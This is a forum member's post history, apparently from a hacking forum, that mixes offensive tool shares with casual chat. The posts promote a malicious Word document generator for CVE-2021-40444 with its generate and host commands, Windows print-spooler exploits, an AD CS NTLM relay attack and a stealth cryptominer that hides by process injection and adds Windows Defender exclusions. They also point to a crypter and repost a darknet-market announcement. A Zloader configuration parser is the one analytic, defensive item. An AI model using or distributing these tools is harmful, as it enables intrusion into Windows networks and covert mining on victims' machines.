bio.sh

Active Members
  • Posts: 147
  • Joined
  • Days Won: 20

Everything posted by bio.sh

  1. Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

     Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

     You need to install lcab first (sudo apt-get install lcab)

     Check REPRODUCE.md for manual reproduce steps

     If your generated cab is not working, try pointing out exploit.html URL to calc.cab

     Using

     First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system()

     ```
     python3 exploit.py generate test/calc.dll http://<SRV IP>
     ```

     Once you generate the malicious docx (will be at out/) you can set up the server:

     ```
     sudo python3 exploit.py host 80
     ```

     Finally try the docx in a Windows Virtual Machine:

     Download Link : https://github.com/lockedbyte/CVE-2021-40444
  2.
     ```
     from mwcp.parser import Parser
     import struct
     import string
     import pefile
     import yara
     import re
     from Crypto.Cipher import ARC4
     import logging

     log = logging.getLogger(__name__)

     rule_source = '''
     rule Zloader
     {
         meta:
             description = "Zloader Payload"
             cape_type = "Zloader Payload"
         strings:
             $rc4_init = {31 [1-3] 66 C7 8? 00 01 00 00 00 00 90 90 [0-5] 8? [5-90] 00 01 00 00 [0-15] (74|75)}
             $decrypt_conf = {e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 e8 ?? ?? ?? ??}
         condition:
             uint16(0) == 0x5A4D and any of them
     }
     '''

     MAX_STRING_SIZE = 32

     yara_rules = yara.compile(source=rule_source)


     def decrypt_rc4(key, data):
         cipher = ARC4.new(key)
         return cipher.decrypt(data)


     def string_from_offset(data, offset):
         # Read a NUL-terminated string of at most MAX_STRING_SIZE bytes.
         string = data[offset : offset + MAX_STRING_SIZE].split(b"\0")[0]
         return string


     class Zloader(Parser):

         DESCRIPTION = 'Zloader configuration parser'

         def run(self):
             filebuf = self.file_object.file_data
             pe = pefile.PE(data=filebuf, fast_load=False)
             image_base = pe.OPTIONAL_HEADER.ImageBase
             matches = yara_rules.match(data=filebuf)
             if not matches:
                 return
             for match in matches:
                 if match.rule != "Zloader":
                     continue
                 # match.strings is indexed as (offset, identifier, data) tuples,
                 # the layout used by yara-python before 4.3.
                 for item in match.strings:
                     if '$decrypt_conf' in item[1]:
                         # Skip the four calls (4 * 5 bytes) and the push opcode
                         # to reach the operand of the first "push imm32".
                         decrypt_conf = int(item[0]) + 21
                         # First push operand: virtual address of the RC4 key string.
                         va = struct.unpack("<I", filebuf[decrypt_conf:decrypt_conf + 4])[0]
                         key = string_from_offset(filebuf, pe.get_offset_from_rva(va - image_base))
                         # Second push operand: virtual address of the encrypted config.
                         data_offset = pe.get_offset_from_rva(
                             struct.unpack("<I", filebuf[decrypt_conf + 5:decrypt_conf + 9])[0] - image_base
                         )
                         enc_data = filebuf[data_offset:].split(b"\0\0")[0]
                         raw = decrypt_rc4(key, enc_data)
                         # The decrypted config is a list of fields separated by double NULs.
                         items = list(filter(None, raw.split(b'\x00\x00')))
                         self.reporter.add_metadata("other", {"Botnet name": items[1].lstrip(b'\x00')})
                         self.reporter.add_metadata("other", {"Campaign ID": items[2]})
                         # Renamed from "item" so the outer loop variable is not shadowed.
                         for entry in items:
                             entry = entry.lstrip(b'\x00')
                             if entry.startswith(b'http'):
                                 self.reporter.add_metadata("address", entry)
                             elif len(entry) == 16:
                                 self.reporter.add_metadata("other", {"RC4 key": entry})
             return
     ```
  3. SpoolSploit: collection of Windows print spooler exploits

     Summary

     SpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access.

     Download link: https://github.com/BeetleChunks/SpoolSploit#create-and-access-the-spoolsploit-docker-container
  4. The goal of this article is to get you started hacking cars — fast, cheap, and easy. In order to do this, we’ll spoof the RPM gauge as an example.

     The following is by no means an exhaustive tutorial. It instead aims to provide just enough information to get you up and running. If you want to dig deeper you can check out the must-reads at the end.

     If you decide to carry out this tutorial in real life, you’ll need a Linux computer (or a virtual Linux machine), and a CAN-to-USB device (which we’ll look into later).

     A car is a network

     A car consists of multiple computers to control the engine, transmission, windows, locks, lights, etc. These computers are called electronic control units (ECU) and communicate with each other over a network. For example, when you press the button on your steering wheel to increase the volume of the radio, the steering wheel ECU sends a command to increase volume onto the network, the radio ECU then sees this command and acts accordingly.

     There are multiple networks in a car, generally at least two:

       • One for critical data such as engine and powertrain messages
       • And one for less critical data such as radio and door locks

     The critical network uses a fast and reliable protocol whereas the non-critical network uses a slower, less reliable but cheaper protocol. The number of networks as well as which ECUs are networked together depends on the car make, model and year. An ECU could also be connected to multiple networks.

     Reference link: https://www.freecodecamp.org/news/hacking-cars-a-guide-tutorial-on-how-to-hack-a-car-5eafcfbbb7ec/

     Connecting to a network

     Some networks can be accessed via the OBD-II port. OBD-II is mandatory on all cars and light trucks built in the US after 1996 and Europe after 2004. The connector is within arm's reach of the driver’s seat. You might need to lift off some plastic cover but it is always accessible without tools.

     Software

     To communicate with the device you need to install the can-utils package on your Linux machine. You can do this by typing the following into the Linux prompt:

     ```
     sudo apt-get install can-utils
     ```

     Can-utils makes it extremely easy to send, receive and analyze CAN packets. These are the commands that we will use.

       • cansniffer: display only the packets that are changing
       • candump: dump all received packets
       • cansend: send a packet

     Linux has CAN support built in to the kernel via SocketCAN. This makes it easy to write your own additional programs. You can interact with the CAN bus in the same way you would interact with any other network, i.e. via sockets.
  5. Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different directory objects. However, it could allow red team operators to conduct an NTLM relay attack towards the web interface of an AD CS in order to compromise the network. The web interface is used for allowing users to obtain a certificate (web enrollment), is over HTTP protocol, doesn’t support signing and accepts NTLM authentication.

     The details of the attack have been presented by Will Schroeder and Lee Christensen in the Certified Pre-Owned whitepaper. The attack forces the domain controller machine account (DC$) to authenticate towards a host on which NTLM relay is configured. The authentication is relayed towards the Certificate Authority (CA) and raises a request for a certificate. Once the certificate is generated for the DC$ account an attacker could use this to perform arbitrary operations on the domain controller such as retrieving the hash of the Kerberos account in order to create a golden ticket and establish domain persistence or dump hashes of domain administrators and establish a communication channel with the domain controller.

     Reference link, more info and examples: https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/
  6. SilentXMRMiner v1.4.4 - Based on Lime Miner v0.3

     Can mine all the following algorithms and thus all the cryptocurrencies that use them: List of algorithms

     Main Features

       • .NET - Coded in C#, requires .NET Framework 4.5
       • Injection (Silent/Hidden) - Hide payload behind another process like explorer.exe, conhost.exe, svchost.exe or some other process
       • CPU & GPU Mining - Can mine on Both CPU and GPU (Nvidia & AMD)
       • Idle Mining - Can be configured to mine at different usages or not at all while computer is or isn't in use
       • Stealth - Pauses the miner and clears the GPU memory while any of the programs in the "Stealth Targets" option are open
       • Watchdog - Replaces the miner file if removed and starts it if the injected miner is closed down
       • Remote Configuration - Can get the miner settings remotely from a URL every 100 minutes
       • Bypass Windows Defender - Adds exclusions into Windows Defender for the general folders the miner uses
       • Online Downloader - Can download the miner binary during runtime to greatly decrease file size and detections

     Download Links:
     https://github.com/UnamSanctam/SilentXMRMiner
     https://github.com/UnamSanctam/SilentETHMiner
  7. I could go for some mici
  8. Why the hell would you open a file like that with an editor? Obviously you'll kill it :))... why not less/more? Or split, like kev told you too
  9. European prices, African salaries, a crap system... Get out if you can
  10. OBS and FTP?
  11. I left you a PM back then with something similar... see if it helps you at all
  12. ahem...royal crypter
  13. That's right: less money, fewer requirements, easier to control ... because that's how it is here
  14. It gets you as far as the company's door and makes you realize you threw your money out the window instead of getting a proper certification
  15. Drop the idea of CompTIA Sec+... there are other certs that are worthwhile
  16. You read that right, AlphaB** is back. If you do not know who we are a quick search on the Internet provides enough information. I am DeSnake, security administrator and co-founder of AlphaB**. The following message is signed with authentic key. My original PGP key which expired 8th March 2019 has been extended. The key has the same fingerprint (95E7 766E 6AC8 AECD 1B6F 11A5 0E28 8FD2 E281 93C0) only expiry date now is up until July 3rd 2031. Off topic
  17. Not necessarily, but I want to be in shape by the time we meet... I heard that whoever gets drunk first pays
  18. I'm starting to drink right now... so I don't get bored...
  19. I don't want to be "that guy", but you'll find what you're looking for on Google in the first search results ... something that bypasses the ones you listed above